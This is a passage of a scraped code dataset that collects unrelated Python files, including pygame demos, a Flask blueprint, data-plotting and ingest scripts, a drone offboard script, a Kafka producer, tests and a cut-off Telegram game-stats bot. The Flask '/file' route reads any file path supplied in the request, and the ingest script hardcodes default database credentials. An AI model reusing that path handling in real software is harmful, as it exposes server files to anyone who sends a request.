SCREENHEIGHT)/2)\n Display.blit(Time,TimeRect)\n\n Chance = TheFont.render(\"Chance: \" + str(chance), True, BLACK)\n ChanceRect = Chance.get_rect()\n ChanceRect.center = (ChanceRect.width/2 + (TVSCREENWIDTH - SCREENWIDTH)/2 + 10, TimeRect.height + ChanceRect.height/2 + (TVSCREENHEIGHT - SCREENHEIGHT)/2)\n Display.blit(Chance, ChanceRect)\n \n\n pygame.display.update()\n pygame.time.Clock().tick(FPS)\n \nstartscreen()\nmain()\ntime.sleep(2)\npygame.quit()\nsys.exit()\n\n","sub_path":"Glitchman TV.py","file_name":"Glitchman TV.py","file_ext":"py","file_size_in_byte":16236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21594709","text":"from flask import Blueprint\n\nfrom flask import render_template, request, redirect\nfrom flask import url_for, make_response\n\nfrom ..api import SessionCore\nfrom ..items.Session import Session\n\nmod = Blueprint('pages', __name__, )\n\n@mod.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n error, sessions = SessionCore.getRecent(5)\n return render_template('index.html', sessions=sessions, error=error)\n\n\n@mod.route('/file', methods=[\"GET\"])\ndef file():\n filePath = request.args.get('path')\n\n if filePath == None:\n return render_template('invalid.html')\n\n sessionObj = SessionCore.sessionExist(filePath)\n\n if not sessionObj:\n sessionObj = SessionCore.createNewSession(filePath)\n\n # Save content of original text file into temp file\n import shutil\n shutil.copyfileobj(open(filePath), open(sessionObj.getTName(), 'wb'))\n\n\n response = make_response(render_template('file.html', file=filePath))\n\n response.set_cookie('fname', sessionObj.getFName())\n response.set_cookie('tname', sessionObj.getTName())\n response.set_cookie('lastprofile', sessionObj.getLastProfileId())\n\n return response\n\n\n@mod.route('/sessions', methods=[\"GET\"])\ndef sessions():\n return 'Sessions'\n","sub_path":"app/views/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"539232087","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfilename = 'Ajour-20170912.txt'\nrows = open(filename).read().split('\\n')\n\nrows = [i for i in rows if 'eventhandling' in i]\n\n\nevs=[]\ndurs=[]\nfor x in rows:\n fields = x.split(' ')\n if len(fields)<=6: continue\n dur = fields[3]\n ev = fields[6]\n if 'RecordedEvent' in ev: continue\n #if int(dur) < 2500:\n # continue\n evs.append(str(ev))\n durs.append(int(dur))\n print(dur,ev)\n #df.append( [{'ev':ev, 'dur':dur}] )\n#print (len(rows))\n\ndf = pd.DataFrame( {'ev': evs, 'dur': durs } ) #columns=('ev', 'dur'))\n\n\nprint(df.head())\nprint('type?', df.dtypes)\nprint('\\n')\ngr = df.groupby('ev')\n\ndf2 = pd.DataFrame({col:vals['dur'] for col,vals in gr})\n\nmeds = df2.median()\n#meds.sort(ascending=False)\nmeds.sort_values(ascending=False, inplace=True)\ndf2 = df2[meds.index]\ndf2.boxplot(rot=89) #, showmeans=True)\n\nplt.show()\n\n\nprint('\\n')\nprint(gr['dur'].agg(np.size)) \nprint('\\n')\n\n\nprint('\\n')\nprint(gr['dur'].agg(np.mean)) \nprint('\\n')\n\ndf.boxplot(column='dur', by='ev', rot=89, showmeans=True) #, meanline=True)\n#df.boxplot(column='dur', by='ev') #, rot=89, showmeans=True) #, meanline=True)\n\nplt.show()","sub_path":"matplot_groups/avgEventTimes.py","file_name":"avgEventTimes.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"613163798","text":"import cv2\r\nimport csv\r\nimport time\r\nimport os\r\nfrom time import gmtime, strftime\r\nfrom tkinter import messagebox\r\nfrom tkinter import *\r\n\r\nisSelecting = False\r\nroi = []\r\nw = 1\r\ncsv_data = []\r\n\r\n#Tkinter UI Window Class\r\nclass Window(Frame):\r\n\r\n def __init__(self, master=None):\r\n Frame.__init__(self, master) \r\n self.master = master\r\n self.init_window()\r\n\r\n #Creation of init_window\r\n def init_window(self):\r\n self.master.title(\"Save Session\")\r\n self.pack(fill=BOTH, expand=1)\r\n\r\n L1 = Label(self, text=\"Name Of Session:\")\r\n L1.place(x=20, y = 20)\r\n \r\n self.E1 = Entry(self, bd =5)\r\n self.E1.place(x=10, y= 50)\r\n\r\n ButtonEntry = Button(self, text=\"Save Session\",command=self.saveInputCSVName, height = 2, width = 20)\r\n ButtonEntry.place(x=5,y=100) \r\n\r\n def saveInputCSVName(self):\r\n returnCSV = saveCSVData(self.E1.get())\r\n print(returnCSV)\r\n exit()\r\n\r\n#Save CSV Data\r\ndef saveCSVData(name):\r\n with open('Choose_Parking_Spots/csv/' + name + '.csv','w') as fp:\r\n writer = csv.writer(fp, delimiter=',')\r\n writer.writerows(csv_data)\r\n\r\n\r\n#Get Recent Created Folder and grab image\r\ndef returnOriginalImage():\r\n directory = \"Picture_Saves/\"\r\n image_directory = max([os.path.join(directory,d) for d in os.listdir(directory)], key=os.path.getmtime)\r\n image_read_path = image_directory + \"/initial.png\"\r\n print(image_read_path)\r\n img = cv2.imread(image_read_path,cv2.IMREAD_UNCHANGED)\r\n #img = cv2.resize(img, (960, 540)) \r\n return img\r\n\r\n#Used when user doesn't want to keep rectangle\r\ndef restoreBackupImage():\r\n currentImage = backupImage\r\n\r\n#Updates backup image to print a new rectangle on area\r\ndef updateBackupImage( newImage ):\r\n backupImage = newImage\r\n\r\n#Handles events pertaning to the main opencv window\r\ndef eventROI(event, x, y, flags, param):\r\n global isSelecting, roi, w, csv_string\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n isSelecting = True\r\n roi = [x,y,x,y]\r\n elif event == cv2.EVENT_MOUSEMOVE:\r\n if isSelecting == True:\r\n roi[2] = x\r\n roi[3] = y\r\n elif event == cv2.EVENT_LBUTTONUP:\r\n \r\n #answer = messagebox.askyesno(\"Question\",\"Keep Recent Chosen Parking Spot?\")\r\n answer = \"Yes\"\r\n if answer == \"Yes\":\r\n isSelecting = False\r\n roi[2] = x\r\n roi[3] = y\r\n print (w,y1,y2,x1,x2)\r\n #Create list to put into other csv list\r\n temp_list = [w,roi[0],roi[1],roi[2],roi[3]]\r\n csv_data.append(temp_list)\r\n #draw rectangles and save as new display image\r\n cv2.rectangle(backupImage, (roi[0],roi[1]), (roi[2], roi[3]), (0,255,0),2)\r\n updateBackupImage(currentImage)\r\n w = w + 1\r\n else:\r\n isSelecting = False\r\n restoreBackupImage()\r\n\r\n#Display promt for name\r\ndef displayPromtForFileName():\r\n top = Tk()\r\n top.geometry(\"200x160\")\r\n app = Window(top)\r\n top.mainloop() \r\n\r\n\r\n \r\n\r\n#Init Vars\r\nwindowNameMain = 'Choose Parking Spaces'\r\nwindowCropName='Parking Space: '\r\nesc_keycode = 27\r\nwait_time=1\r\ncurrentImage = returnOriginalImage()\r\nbackupImage = returnOriginalImage()\r\n\r\n\r\nif currentImage is not None:\r\n print(\"Cloned current image\")\r\n clone = backupImage.copy()\r\n cv2.namedWindow(windowNameMain, cv2.WINDOW_AUTOSIZE)\r\n cv2.setMouseCallback(windowNameMain, eventROI)\r\n\r\n while True:\r\n cv2.imshow(windowNameMain, currentImage)\r\n\r\n if len(roi) == 4:\r\n currentImage = backupImage.copy()\r\n roi = [0 if i < 0 else i for i in roi]\r\n cv2.rectangle(currentImage, (roi[0],roi[1]), (roi[2], roi[3]), (0,255,0),2)\r\n if roi[0] > roi[2]:\r\n x1 = roi[2]\r\n x2 = roi[0]\r\n else:\r\n x1 = roi[0]\r\n x2 = roi[2]\r\n if roi[1] > roi[3]:\r\n y1 = roi[3]\r\n y2 = roi[1]\r\n else:\r\n y1 = roi[1]\r\n y2 = roi[3]\r\n #Displays each car in seperate window for debugging\r\n crop_img = clone[y1 : y2,x1 : x2]\r\n\r\n if len(crop_img) and not isSelecting:\r\n cv2.namedWindow(windowCropName + \" \" + str(w - 1), cv2.WINDOW_AUTOSIZE)\r\n cv2.imshow(windowCropName + \" \" + str(w - 1), crop_img)\r\n \r\n k = cv2.waitKey(wait_time)\r\n if k == esc_keycode:\r\n cv2.destroyAllWindows()\r\n displayPromtForFileName()\r\n break\r\n\r\nelse:\r\n print ('''Error: Image Not Found''')","sub_path":"Choose_Parking_Spots/crop_image_new.py","file_name":"crop_image_new.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"300047637","text":"import pandas as pd\nfrom pathlib import Path\nfrom sqlalchemy import create_engine\n\ncsv_to_db_mapper = {\n \"Name\": \"name\",\n \"San Francisco County\": \"sf_county\",\n \"Alameda County\": \"alameda_county\",\n \"San Mateo County\": \"san_mateo_county\",\n \"Contra Costa County\": \"contra_costa_county\",\n \"Santa Clara County\": \"santa_clara_county\",\n \"County\": \"county\",\n \"Category\": \"category\",\n \"Black Owned\": \"black_owned\",\n \"LGBTQ\": \"lgbtq\",\n \"Women\": \"women\",\n \"Who Applies\": \"who_applies\",\n \"100 or fewer employees\": \"_100_or_fewer\",\n \"500 or fewer employees\": \"_500_or_fewer\",\n \"750 or fewer employees\": \"_750_or_fewer\",\n \"750 or more\": \"_750_more\",\n \"Type of Relief\": \"relief_type\",\n \"Award Type\": \"award_type\",\n \"Award Amount Specified\": \"award_amount_specified\",\n \"Max Award Amount\": \"max_award_amount\",\n \"Interest Rate Applicable\": \"interest_rate_applicable\",\n \"Interest rate\": \"interest_rate\",\n \"Type of Support\": \"support_type\",\n \"Public or Private\": \"sector_type\",\n \"Type Entity Offering Support\": \"supported_entity\",\n \"Name of Entity\": \"entity_name\",\n \"Is there a Deadline\": \"deadline_applicable\",\n \"Deadline\": \"deadline\",\n \"English\": \"english\",\n \"Spanish\": \"spanish\",\n \"Chinese\": \"chinese\",\n \"Website\": \"website_url\",\n \"Other Details\": \"description\"\n}\n\n\ndef main():\n connection = create_engine('postgresql://postgres:postgres@localhost:5000/bar')\n scripts_file = Path(Path(__file__).absolute().parent, \"raw_data.csv\")\n df = pd.read_csv(scripts_file)\n df = df.iloc[:, :-5]\n df = df.rename(columns=csv_to_db_mapper)\n df.drop(df[df[\"name\"].isna()].index, inplace=True)\n df.to_sql('relief', connection, if_exists=\"replace\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/ingest_raw_data.py","file_name":"ingest_raw_data.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640646354","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n\"\"\"class like gamepad\"\"\"\r\nimport pygame\r\nfrom pygame.locals import *\r\nimport sys\r\n\r\n# 画面サイズ\r\nSCREEN_W, SCREEN_H = 640, 480\r\n\r\n\r\nclass GamePad:\r\n \"\"\"ゲームパッドクラス\"\"\"\r\n __state = [[] for j in range(2)]\r\n __double_buffer_idx = 0\r\n\r\n def __init__(self):\r\n \"\"\"コンストラクタ\"\"\"\r\n self.__state[0] = pygame.key.get_pressed()\r\n self.__state[1] = self.__state[0]\r\n\r\n def update(self):\r\n \"\"\"キーの状態を更新する\"\"\"\r\n self.__double_buffer_idx ^= 1\r\n self.__state[self.__double_buffer_idx] = pygame.key.get_pressed()\r\n\r\n def is_triggered(self, pygame_key_code):\r\n \"\"\"キーが押された瞬間をチェック\"\"\"\r\n idx = self.__double_buffer_idx\r\n key = pygame_key_code\r\n return self.__state[idx][key] and \\\r\n not self.__state[1-idx][key]\r\n\r\n def is_released(self, pygame_key_code):\r\n \"\"\"キーが離された瞬間をチェック\"\"\"\r\n idx = self.__double_buffer_idx\r\n key = pygame_key_code\r\n return not self.__state[idx][key] and \\\r\n self.__state[1-idx][key]\r\n\r\n def is_pressed(self, pygame_key_code):\r\n \"\"\"キーが押されている状態をチェック\"\"\"\r\n idx = self.__double_buffer_idx\r\n key = pygame_key_code\r\n return self.__state[idx][key] and \\\r\n self.__state[1-idx][key]\r\n\r\n def is_on(self, pygame_key_code):\r\n \"\"\"キーが押されているかをチェック\"\"\"\r\n idx = self.__double_buffer_idx\r\n key = pygame_key_code\r\n return self.__state[idx][key]\r\n\r\n\r\ndef main():\r\n \"\"\"エントリポイント\"\"\"\r\n # pygame初期化\r\n pygame.init()\r\n\r\n # 画面サイズを設定\r\n screen = pygame.display.set_mode((SCREEN_W, SCREEN_H))\r\n\r\n # タイトルバーの文字列を設定\r\n pygame.display.set_caption(u\"ゲームパッドのようなクラス\")\r\n\r\n # clockオブジェクトの取得\r\n clock = pygame.time.Clock()\r\n\r\n # 動作確認用のオブジェクト情報\r\n x = 0\r\n y = 0\r\n RECT_SIZE = 10\r\n\r\n # GamePadの作成\r\n pad = GamePad()\r\n\r\n # ゲームループ\r\n while True:\r\n # FPSを60に固定\r\n clock.tick(60)\r\n\r\n # 画面を青色で塗りつぶす\r\n screen.fill((0, 0, 255))\r\n\r\n # 押されているキーの状態を取得\r\n pressed_keys = pygame.key.get_pressed()\r\n if pad.is_pressed(K_LEFT):\r\n x -= 2\r\n if pad.is_pressed(K_RIGHT):\r\n x += 2\r\n if pad.is_pressed(K_UP):\r\n y -= 2\r\n if pad.is_pressed(K_DOWN):\r\n y += 2\r\n\r\n # キーの状態を確認\r\n pad.update()\r\n if pad.is_triggered(K_SPACE):\r\n print(\"triggered\")\r\n #print(pad._GamePad__state[0][K_SPACE])\r\n #print(pad._GamePad__state[0][K_SPACE])\r\n #print(pad._GamePad__state[1][K_SPACE])\r\n if pad.is_pressed(K_SPACE):\r\n print(\"pressed\")\r\n if pad.is_released(K_SPACE):\r\n print(\"released\")\r\n #if pad.is_on(K_SPACE):\r\n # print(\"on\")\r\n\r\n # 句形の描画\r\n pygame.draw.rect(screen, (255, 255, 0), Rect(x, y, RECT_SIZE, RECT_SIZE))\r\n\r\n # 画面を更新\r\n pygame.display.update()\r\n # イベント処理\r\n for event in pygame.event.get():\r\n # 終了イベント\r\n if event.type == QUIT:\r\n sys.exit()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","sub_path":"12_class_like_gamepad.py","file_name":"12_class_like_gamepad.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243943322","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/DeepBrainSeg/helpers/dcm2niftii.py\n# Compiled at: 2019-11-11 08:44:10\n# Size of source mod 2**32: 998 bytes\nimport os, sys, numpy as np, dicom2nifti\nfrom time import gmtime, strftime\nimport dicom2nifti.settings as settings\n\ndef singleDicom2nifti(input_path, output_path, verbose=False):\n \"\"\"\n \"\"\"\n if not os.path.exists(input_path):\n raise ValueError(\"Path doesn't exist\")\n output_dir = os.path.dirname(output_path)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n if verbose:\n print('[INFO: DeepBrainSeg] (' + strftime('%a, %d %b %Y %H:%M:%S +0000', gmtime()) + ') ' + 'Working on: {}'.format(input_path))\n dicom2nifti.dicom_series_to_nifti(input_path, output_path)\n\n\ndef convertDcm2nifti(path_json, output_dir, verbose=False):\n \"\"\"\n path_json: {'key1': path1, 'key2': path2}\n output_dir: nifty save dir path\n \"\"\"\n for key in path_json.keys():\n input_path = path_json[key]\n output_path = os.path.join(output_dir, key + '.nii.gz')\n singleDicom2nifti(input_path, output_path, verbose)","sub_path":"pycfiles/DeepBrainSeg-0.2.0-py3.5/dcm2niftii.cpython-35.py","file_name":"dcm2niftii.cpython-35.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"338117519","text":"#!/usr/bin/env python\nimport rospy\nimport mavros\nimport mavros.command\nimport mavros_msgs.msg\nimport mavros_msgs.srv\nimport time\nfrom mavros.utils import *\nfrom std_msgs.msg import Header\nfrom mavros_msgs.msg import PositionTarget\nfrom mavros_msgs.msg import State\nfrom mavros_msgs.srv import SetMode \nfrom mavros_msgs.srv import CommandBool\nfrom mavros import setpoint as SP\n\nstate = mavros_msgs.msg.State;\ndef state_callback(msg):\n state = msg \n #print(\"CurrentMode:\",state.mode)\n #print(\"CurrentMode:\",state.armed)\n return 0\n\ndef main():\n rospy.init_node('offboardX')\n rate=rospy.Rate(20)\n mavros.set_namespace('/mavros')\n state_sub = rospy.Subscriber(mavros.get_topic('state'),mavros_msgs.msg.State,state_callback)\n arming = rospy.ServiceProxy('/mavros/cmd/arming',mavros_msgs.srv.CommandBool)\n #set_mode=rospy.ServiceProxy('/mavros/set_mode',SetMode)\n set_mode=rospy.ServiceProxy('/mavros/set_mode',mavros_msgs.srv.SetMode)\n #local_pub = rospy.Publisher(mavros.get_topic('PositionTarget'),mavros_msgs.msg.PositionTarget,queue_size=10)\n local_pub = rospy.Publisher(mavros.get_topic('PositionTarget'),mavros_msgs.msg.PositionTarget,queue_size=10)\n pose = PositionTarget()\n pose.header = Header()\n pose.header.frame_id=\"att_pose\"\n pose.header.stamp=rospy.Time.now()\n pose.position.x=0\n pose.position.y=0\n pose.position.z=15\n while(not state.connected):\n rate.sleep()\n for i in range(0,50):\n local_pub.publish(pose)\n #mavros.command.arming(True)\n #set_mode(0,'OFFBOARD')\n last_request = rospy.Time.now()\n while 1:\n if(state.mode != \"OFFBOARD\" and (rospy.Time.now()-last_request > rospy.Duration(5.0))):\n print(\"inside22\")\n if(set_mode(0,'OFFBOARD').success):\n print(\"Offboard enabled\")\n last_request = rospy.Time.now()\n else:\n if(not state.armed and (rospy.Time.now()-last_request > rospy.Duration(5.0))):\n if(mavros.command.arming(True)):\n print(\"vehicle armed\") \n last_request = rospy.Time.now()\n\n print(\"entered\")\n local_pub.publish(pose)\n rospy.spin()\n rate.sleep()\n return 0\n\n\nif __name__=='__main__':\n main()\n","sub_path":"catkin_ws/src/offboard/scripts/offboardX.py","file_name":"offboardX.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"568117433","text":"# -*- coding: utf-8 -*-\n# -*- Mode: Python -*-\n# vi:si:et:sw=4:sts=4:ts=4\nfrom feat.agents.base import (descriptor, replay, task)\nfrom feat.agencies.tasks import TaskState, NOT_DONE_YET\nfrom feat.common import defer\nfrom feat.interface import protocols\n\nfrom feat.test import common\n\n\nclass SomeException(Exception):\n pass\n\n\nclass BaseTestTask(task.BaseTask, common.Mock):\n\n def __init__(self, *args, **kwargs):\n task.BaseTask.__init__(self, *args, **kwargs)\n common.Mock.__init__(self)\n\n @replay.immutable\n def _get_medium(self, state):\n return state.medium\n\n\nclass AsyncTask(BaseTestTask):\n\n @replay.entry_point\n def initiate(self, state):\n return NOT_DONE_YET\n\n @replay.mutable\n def terminate(self, state, arg):\n state.medium.terminate(arg)\n\n @replay.mutable\n def fail(self, state, arg):\n state.medium.fail(arg)\n\n\nclass TimeoutTask(BaseTestTask):\n\n protocol_id = 'timeout-task'\n timeout = 1\n\n def __init__(self, *args, **kwargs):\n BaseTestTask.__init__(self, *args, **kwargs)\n\n @common.Mock.stub\n def expired(self):\n pass\n\n @common.Mock.record\n def initiate(self):\n d = defer.Deferred()\n return d\n\n\nclass DummyException(Exception):\n pass\n\n\nclass ErrorTask(BaseTestTask):\n\n protocol_id = 'error-task'\n\n def __init__(self, *args, **kwargs):\n BaseTestTask.__init__(self, *args, **kwargs)\n\n @common.Mock.record\n def initiate(self):\n raise DummyException('ErrorTask')\n\n\nclass SuccessTask(BaseTestTask):\n\n protocol_id = 'success-task'\n\n def __init__(self, *args, **kwargs):\n BaseTestTask.__init__(self, *args, **kwargs)\n\n @common.Mock.stub\n def initiate(self):\n pass\n\n\n@common.attr(timescale=0.05)\nclass TestTask(common.TestCase, common.AgencyTestHelper):\n\n protocol_type = \"Task\"\n\n @defer.inlineCallbacks\n def setUp(self):\n yield common.TestCase.setUp(self)\n yield common.AgencyTestHelper.setUp(self)\n desc = yield self.doc_factory(descriptor.Descriptor)\n self.agent = yield self.agency.start_agent(desc)\n self.finished = None\n\n def start_task(self, t):\n self.task = self.agent.initiate_protocol(t)\n self.finished = self.task.notify_finish()\n\n def tearDown(self):\n return self.finished\n\n def assertState(self, _, state):\n self.assertFalse(self.task._get_medium().guid in\n self.agent._protocols)\n self.assertEqual(state, self.task._get_medium().state)\n return self.finished\n\n def assertTimeout(self, _):\n self.assertState(_, TaskState.expired)\n self.assertCalled(self.task, 'expired', times=1)\n\n def testInitiateTimeout(self):\n self.start_task(TimeoutTask)\n d = self.cb_after(arg=None, obj=self.task._get_medium(),\n method=\"_terminate\")\n d.addCallback(self.assertTimeout)\n self.assertFailure(self.finished, protocols.ProtocolExpired)\n return d\n\n def testInitiateError(self):\n self.start_task(ErrorTask)\n d = self.cb_after(arg=None, obj=self.agent,\n method=\"unregister_protocol\")\n d.addCallback(self.assertState, TaskState.error)\n self.assertFailure(self.finished, DummyException)\n return d\n\n def testInitiateSuccess(self):\n self.start_task(SuccessTask)\n d = self.cb_after(arg=None, obj=self.agent,\n method=\"unregister_protocol\")\n d.addCallback(self.assertState, TaskState.completed)\n return d\n\n @defer.inlineCallbacks\n def testWaitForState(self):\n self.start_task(TimeoutTask)\n yield self.task._get_medium().wait_for_state(TaskState.expired)\n self.assertFailure(self.finished, protocols.ProtocolExpired)\n self.assertEqual(TaskState.expired, self.task._get_medium().state)\n\n @defer.inlineCallbacks\n def testRetryingProtocol(self):\n d = self.cb_after(None, self.agent, 'initiate_protocol')\n task = self.agent.retrying_protocol(ErrorTask, max_retries=3)\n self.finished = task.notify_finish()\n yield d\n self.assertEqual(task.attempt, 1)\n yield self.cb_after(None, self.agent, 'initiate_protocol')\n yield self.cb_after(None, self.agent, 'initiate_protocol')\n yield self.cb_after(None, self.agent, 'initiate_protocol')\n self.assertEqual(task.attempt, task.max_retries+1)\n self.assertFailure(self.finished, DummyException)\n\n @defer.inlineCallbacks\n def testAsyncTasks(self):\n self.start_task(AsyncTask)\n self.assertFalse(self.task.finished())\n d = self.task.notify_finish()\n self.task.terminate('result')\n res = yield d\n self.assertEqual('result', res)\n self.assertTrue(self.task.finished())\n\n self.start_task(AsyncTask)\n self.assertFailure(self.finished, SomeException)\n self.task.fail(SomeException('result'))\n yield self.finished\n","sub_path":"src/feat/test/test_agencies_emu_tasks.py","file_name":"test_agencies_emu_tasks.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650274718","text":"from kafka import KafkaProducer\nimport json\n\nimport time\nfrom kafka.errors import KafkaError\n\ndef get_data(i):\n \n return {\"First number\":i,\n \"second number\":i\n }\n\n\n# def json_serializer(data):\n# return json.dumps(data).encode(\"utf-8\")\n\nproducer = KafkaProducer(bootstrap_servers=['127.0.0.1:9092'],\n value_serializer=lambda v: json.dumps(v).encode('utf-8'))\n \ndef on_send_success(record_metadata):\n print(record_metadata.topic)\n print(record_metadata.partition)\n print(record_metadata.offset)\n\ndef on_send_error(excp):\n log.error('I am an errback', exc_info=excp)\n # handle exception\ntopic=\"Data_Topic\"\n\nif __name__ == \"__main__\":\n i=0\n while 1 == 1:\n \n data = get_data(i)\n key=bytes(\"key_\"+str(i), encoding='utf-8')\n \n producer.send(topic=topic,key=key, value=data).add_callback(on_send_success).add_errback(on_send_error)\n #producer.send(\"Data_Topic\", data).add_both(add_callback=on_send_success,add_errback=on_send_error)\n \n i=i+1\n time.sleep(4)","sub_path":"kafkapy/producerwithkeys.py","file_name":"producerwithkeys.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"626003530","text":"#\n# Copyright (c) SAS Institute Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\nfrom django.conf.urls.defaults import patterns\nfrom mint.django_rest.rbuilder.images.views.v1 import views as imagesviews\nfrom mint.django_rest import urls\n\nURL = urls.URLRegistry.URL\n\nurlpatterns = patterns('',\n URL(r'/?$',\n imagesviews.ImageTypesService(),\n name='ImageTypes',\n model='images.ImageTypes'),\n URL(r'/(?P\\d+)/?$',\n imagesviews.ImageTypeService(),\n name='ImageType',\n model='images.ImageType')\n)\n","sub_path":"mint/django_rest/rbuilder/images/views/v1/urls_image_types.py","file_name":"urls_image_types.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"5070262","text":"num1 = int(input(\"num1\"))\r\nnum2 = int(input(\"num2\"))\r\nnum3 = int(input(\"num3\"))\r\n\r\nif num1 > num2:\r\n if num1 > num3:\r\n print(num1)\r\nelif num2 > num3:\r\n if num2 > num1:\r\n print(num2)\r\nelif num3 > num2:\r\n if num3 > num1:\r\n print(num3)\r\nelse:\r\n print(\"Please enter diffrent numbers\")","sub_path":"lab3/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"258546242","text":"#!/usr/bin/python\n# coding=utf-8\n\nimport sys\nimport time\nimport sqlite3\nimport telepot\nfrom API_Parsing import *\n\nfrom tkinter import *\nfrom pprint import pprint\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nfrom datetime import date, datetime, timedelta\nimport traceback\n\nimport noti\n\nparseEngine = RiotApiParsing()\nChampionIDDict = {}\ndef replyMatchesData(user, name):\n \n print(user, name)\n ID = parseEngine.getPlayerIDByName(name)#[0] id, [1] accId\n Data = parseEngine.getMatchsByAccountID(ID[1],None,None, beginIndex= 0, endIndex = 3).get('matches')\n for i in Data:\n championID = i.get('champion')\n gameId = i.get('gameId')\n tempData = parseEngine.getMatchByGameID(gameId)\n participant = tempData.get(\"participantIdentities\")\n participantId = 0\n for j in participant:\n p = j.get(\"player\")\n if(p.get(\"accountId\") == ID[1]):\n participantId = j.get(\"participantId\")\n break;\n participant = tempData.get(\"participants\")\n stats = {}\n for j in participant:\n if(j.get(\"participantId\") == participantId):\n stats = j.get(\"stats\")\n break;\n kills = stats.get(\"kills\")\n assists = stats.get(\"assists\")\n win = stats.get(\"win\")\n deaths = stats.get(\"deaths\")\n\n msg = ''\n if(win):\n msg += 'WIN\\n' \n else:\n msg += 'LOSE\\n' \n msg += 'champion : ' + ChampionIDDict[championID] + '\\n'\n msg += 'kills : ' + str(kills) + '\\n'\n msg += 'assists : ' + str(assists) + '\\n'\n msg += 'deaths : ' + str(deaths) + '\\n'\n noti.sendMessage( user, msg )\n\ndef replyRankData(user, name):\n \n print(user, name)\n ID = parseEngine.getPlayerIDByName(name)#[0] id, [1] accId\n Data = parseEngine.getPlayerLeagueByPlayerID(ID[0])\n for i in Data:\n msg = ''\n msg += 'queueType : ' + i.get('queueType') + '\\n'\n msg += 'tier : ' + i.get('tier') + '\\n'\n msg += 'rank : ' + i.get('rank') + '\\n'\n msg += 'leaguePoints : ' + str(i.get('leaguePoints')) + '\\n'\n msg += 'wins : ' + str(i.get('wins')) + '\\n'\n msg += 'losses : ' + str(i.get('losses'))\n noti.sendMessage( user, msg )\n \ndef replyMasteryData(user, name):\n \n print(user, name)\n ID = parseEngine.getPlayerIDByName(name)#[0] id, [1] accId\n Data = parseEngine.getChampionMasteryByPlayerID(ID[0])\n for i in range(3):\n msg = ''\n msg += 'Top' + str(i+1) + '\\n'\n msg += 'champion : ' + ChampionIDDict[Data[i].get('championId')] + '\\n'\n msg += 'championLevel : ' + str(Data[i].get('championLevel')) + '\\n'\n msg += 'championPoints : ' + str(Data[i].get('championPoints'))\n noti.sendMessage( user, msg )\n \n\ndef check( user ):\n conn = sqlite3.connect('users.db')\n cursor = conn.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS users( user TEXT, location TEXT, PRIMARY KEY(user, location) )')\n cursor.execute('SELECT * from users WHERE user=\"%s\"' % user)\n for data in cursor.fetchall():\n row = 'id:' + str(data[0]) + ', location:' + data[1]\n noti.sendMessage( user, row )\n\n\ndef handle(msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n if content_type != 'text':\n noti.sendMessage(chat_id, '난 텍스트 이외의 메시지는 처리하지 못해요.')\n return\n\n text = msg['text']\n args = text.split(' ')\n if text.startswith('전적') and len(args)>1:\n print('try to 전적', args[1])\n replyMatchesData( chat_id, args[1] )\n elif text.startswith('랭크') and len(args)>1:\n print('try to 랭크', args[1])\n replyRankData( chat_id, args[1] )\n elif text.startswith('모스트') and len(args)>1:\n print('try to 모스트', args[1])\n replyMasteryData( chat_id, args[1] )\n elif text.startswith('확인'):\n print('try to 확인')\n check( chat_id )\n else:\n noti.sendMessage(chat_id, \"\"\"모르는 명령어입니다.\\n전적 '유저이름'\\n랭크 '유저이름'\\n모스트 '유저이름'\"\"\")\n\ndef start():\n temp = (parseEngine.getAllChampionsData()).items()\n for i in temp:\n ChampionIDDict[int(i[1]['key'])] = i[0]\n\n window = Tk()\n window.title(\"League Of Legends Search\")\n window.geometry(\"250x400\")\n window.resizable(False, False)\n\n today = date.today()\n 